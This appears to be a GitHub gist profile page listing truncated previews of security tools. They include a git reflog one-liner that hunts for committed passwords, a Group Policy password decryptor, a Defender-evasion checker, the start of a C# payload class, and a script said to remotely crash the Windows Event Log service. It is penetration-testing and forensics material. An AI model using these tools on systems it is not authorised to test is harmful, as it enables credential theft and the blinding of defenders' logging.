Jesse Moore jessefmoore


Finding creds in git repos is awesome.

$ for commit in $(seq 1 $(git reflog | wc -l)); do git diff HEAD@{$commit} 2>/dev/null | grep password; done
-spring.datasource.password=g!'301T%y%xT@uL`
+spring.datasource.password=4AT&G;[H@&'\^uDK
-spring.datasource.password=UmAnR=-v|{2=gyx?
+spring.datasource.password=4AT&G;[H@&'\^uDK
...
@jessefmoore
jessefmoore / Non_Microsoft_UserMode_Load_Audit.xml
Created March 1, 2021 17:48 — forked from mgraeber-rc/Non_Microsoft_UserMode_Load_Audit.xml
A WDAC audit-mode policy that will log all non-Windows-signed PE loads
<?xml version="1.0" encoding="utf-8"?>
<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy">
<VersionEx>10.0.1.0</VersionEx>
<PolicyID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyID>
<BasePolicyID>{A244370E-44C9-4C06-B551-F6016E563076}</BasePolicyID>
<PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>
<Rules>
<Rule><Option>Enabled:Unsigned System Integrity Policy</Option></Rule>
<Rule><Option>Enabled:Audit Mode</Option></Rule>
<Rule><Option>Enabled:Advanced Boot Options Menu</Option></Rule>
@jessefmoore
jessefmoore / WSL2-Kali.md
Created January 23, 2021 16:53
WSL2 - Kali Linux
using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Net;
using System.IO.Compression;
public class Payload
{
@jessefmoore
jessefmoore / GPPDecrypt.ps1
Created October 31, 2020 22:30 — forked from andreafortuna/GPPDecrypt.ps1
Group Policy Preferences Decoder
param (
[string]$cpassword
)
function Get-DecryptedCpassword {
[CmdletBinding()]
Param (
[string] $Cpassword
)
@jessefmoore
jessefmoore / stickynoteparser.py
Created October 16, 2020 15:31 — forked from daddycocoaman/stickynoteparser.py
Parses sticky note files in .snt/.sqlite formats. SQLite files may require the WAL and SHM files of the same name as well. Once run, the WAL/SHM files will be merged into the .sqlite file.
import json
import sqlite3
import olefile
import argparse
def parse_snt_file(file):
# https://www.tutorialspoint.com/python_digital_forensics/python_digital_forensics_important_artifacts_in_windows
if not olefile.isOleFile(file):
return "Invalid OLE file"
LOCATION=$(curl -s https://api.github.com/repos/<YOUR ORGANIZATION>/<YOUR REPO>/releases/latest \
| grep "tag_name" \
| awk '{print "https://github.com/<YOUR ORGANIZATION>/<YOUR REPO>/archive/" substr($2, 2, length($2)-3) ".zip"}') \
; curl -L -o <OUTPUT FILE NAME> $LOCATION

for example:

LOCATION=$(curl -s https://api.github.com/repos/byt3bl33d3r/CrackMapExec/releases \
| grep "tag_name" \
@jessefmoore
jessefmoore / pydefendercheck.py
Created September 24, 2020 21:24 — forked from daddycocoaman/pydefendercheck.py
PyDefenderCheck
##################################################
## PyDefenderCheck - Python implementation of DefenderCheck
##################################################
## Author: daddycocoaman
## Based on: https://github.com/matterpreter/DefenderCheck
##################################################
import argparse
import enum
<?xml version="1.0" encoding="UTF-8"?>
<opml version="1.0">
<head>
<title>Olaf subscriptions in feedly Cloud</title>
</head>
<body>
<outline text="PublicFeeds" title="PublicFeeds">
<outline type="rss" text="top scoring links : netsec" title="top scoring links : netsec" xmlUrl="http://www.reddit.com/r/netsec/top/.rss" htmlUrl="https://www.reddit.com/r/netsec/top/"/>
<outline type="rss" text="For [Blue|Purple] Teams in Cyber Defence" title="For [Blue|Purple] Teams in Cyber Defence" xmlUrl="https://www.reddit.com/r/blueteamsec.rss" htmlUrl="https://www.reddit.com/r/blueteamsec"/>
@jessefmoore
jessefmoore / eventvwr_crash.py
Created September 19, 2020 03:29 — forked from byt3bl33d3r/eventvwr_crash.py
Crash the Windows Event Log service remotely (needs admin privs)
# Crash the Windows Event Log Service remotely, needs Admin privs
# originally discovered by limbenjamin and accidentally re-discovered by @byt3bl33d3r
#
# Once the service crashes 3 times it will not restart for 24 hours
#
# https://github.com/limbenjamin/LogServiceCrash
# https://limbenjamin.com/articles/crash-windows-event-logging-service.html
#
# Needs the impacket library (https://github.com/SecureAuthCorp/impacket)